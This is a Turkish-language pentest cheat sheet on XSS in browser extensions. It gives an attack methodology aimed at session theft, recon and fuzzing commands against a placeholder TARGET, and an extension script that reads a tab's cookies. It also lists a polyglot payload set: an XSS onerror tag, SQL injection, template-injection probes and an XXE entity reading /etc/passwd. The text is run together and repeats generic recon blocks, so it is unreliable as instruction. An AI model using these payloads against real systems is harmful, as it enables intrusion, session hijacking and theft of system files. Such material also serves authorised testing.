BrowExt - XSS Example
web xss
BrowExt - XSS Example bağlamında saldırgan kontrollü script’in güvenilen origin’de çalışması hedeflenir. Reflected/stored/DOM yolları ve oturum sömürüsü odaklıdır.
Metodoloji
Section titled “Metodoloji”-
Yansıma bağlamını (HTML/attr/JS/URL) işaretçi ile bul.
-
Bağlama uygun payload ve encode katmanını kır.
-
CSP/WAF varsa gadget veya bypass dene.
-
Oturum çalma veya işlem PoC’si üret.
Hedef yığını, endpoint’leri ve auth sınırını netleştir.
curl -skI https://TARGET/whatweb -a 3 https://TARGETkatana -u https://TARGET -jc -d 3 -o crawl.txtffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -mc 200,204,301,302,403arjun -u https://TARGET/api/v1/item --getBrowser extension
Section titled “Browser extension”unzip -l ext.crx || unzip -l ext.zipjq '.permissions,.host_permissions,.content_scripts' manifest.jsonchrome.tabs.query({}, t => chrome.scripting.executeScript({target:{tabId:t[0].id},func:()=>document.cookie}))XSS in extension page → privilege; clickjack options pagePoC / polyglot seti
Section titled “PoC / polyglot seti”'"><img src=x onerror=alert(1)>' OR 1=1-- -{{7*7}}${7*7}#{7*7}<!DOCTYPE a [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><a>&xxe;</a>nuclei -u https://TARGET -as -silentOperasyon notları
Section titled “Operasyon notları”BrowExt - XSS Example sonuçları hedef sürüme ve yığına göre değişir. Her başarılı adımı request/response ile kaydet; sonraki pivot’u not et.
Ek komutlar
Section titled “Ek komutlar”curl -sk https://TARGET/robots.txtnuclei -u https://TARGET -as -silentffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403GET / HTTP/1.1Host: TARGETAccept: */*mkdir -p evidence/web && tee evidence/web/notes.txtBu ekler keşif ve kanıt paketini hızlandırır; asıl sömürü üstteki bölümlerdeki konu-özel payload’larla yapılır.
Ek keşif komutları
Section titled “Ek keşif komutları”curl -sk https://TARGET/robots.txtcurl -sk https://TARGET/sitemap.xmlffuf -u https://TARGET/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,403nuclei -u https://TARGET -as -silentGET / HTTP/1.1Host: TARGETAccept: */*Kanıt toplama
Section titled “Kanıt toplama”mkdir -p evidence/web && tee evidence/web/notes.txtrequest/responsezaman damgasıkullanılan hesapetki özeticurl -sk https://TARGET/ -D evidence/web/headers.txt -o evidence/web/body.html